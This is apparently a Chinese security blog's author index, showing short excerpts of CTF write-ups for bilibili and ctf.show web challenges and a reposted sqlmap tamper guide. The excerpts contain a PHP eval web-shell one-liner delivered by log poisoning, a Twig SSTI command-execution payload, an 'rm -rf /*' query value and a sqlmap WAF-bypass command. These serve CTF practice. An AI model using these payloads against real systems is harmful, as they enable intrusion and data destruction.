作者: huayang

106 篇文章

bilibili CTF 前五题
web1 很明显是改ua 看源码 给出了两个地址 先第一个试试 web2 做法同上只不过url变了 正确的url为 web3 不是注入 不是注入 不是注入 账号 admin 密码 bilibili 这是真没想到... web4 伪造超管很明显要在cookie上做手脚 我们先抓包看看 role那一串我们去解码看看 https://md5.gromwe…
ctf.show萌新计划
we1-web7大抵差不多构造id=1000 web1 ?id='1000' [huayang]web2 ?id=~~1000 web3 ?id=680|960 web4 ?id=682^322 web5 ?id=800^200 web6 ?id=~~1000 web7 ?id=0b1111101000 web8 ?flag=rm -rf /* w…
【转载】sqlmap的使用 —- 自带绕过脚本tamper
原文地址:https://blog.csdn.net/qq_34444097/article/details/82717357 sqlmap在默认的的情况下除了使用char()函数防止出现单引号,没有对注入的数据进行修改,还可以使用–tamper参数对数据做修改来绕过waf等设备。 0x01 命令如下 sqlmap -u [url] --t…
【原创】ctfshow—WEB_AK赛
签到_观己 过滤了php意思就无法使用文件包含 [huayang]查看日志文件/var/log/nginx/access.log 有ua显示可以使用一句话 <?php @eval($_POST[shell]);?> 蚁剑连接即可在根目录下看见flag web1_观字 只需把.换成。即可 web2_观星 一看就知道是布尔盲注 记得web…
【原创】Cookie is so subtle!
打开题目点击flag,随便输入一些 发现疑似ssti注入 验证一下 我们查看cookie发现多出一个user参数 构建payload ;user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}
【原创 超详细】ctf.show月饼杯——web1-3
签到就完事了 第一次做比较正规的题,虽然只做出一道,但成就感还是满满的 [huayang]web1_此夜圆 打开环境发现已提供源代码 <?php error_reporting(0); class a { public $uname; public $password; public function __construct($uname,$…